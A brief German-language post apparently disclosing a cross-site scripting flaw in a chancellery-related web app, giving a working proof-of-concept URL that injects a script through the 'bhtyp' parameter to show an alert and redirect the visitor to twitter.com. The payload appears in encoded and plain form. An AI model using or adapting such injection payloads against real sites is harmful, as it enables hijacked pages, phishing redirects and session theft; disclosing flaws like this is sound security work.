xss lücke der kanzlerapp:

 

http://bka.mep.bz/bka/jsp/index.jsp?subcat=bhfinder_gem&cat=bhfinder&bhtyp=%22%3E%3Cscript%3Ealert%28%22Jetzt%20kommt%20der%20Redirect%22%29;window.document.location=%22http://www.twitter.com%22;%3C/script%3E&plz=8

 

bzw. in klartext:

 

http://bka.mep.bz/bka/jsp/index.jsp?subcat=bhfinder_gem&cat=bhfinder&bhtyp="><script>alert("Jetzt kommt der Redirect");window.document.location="http://www.twitter.com";</script>&plz=8null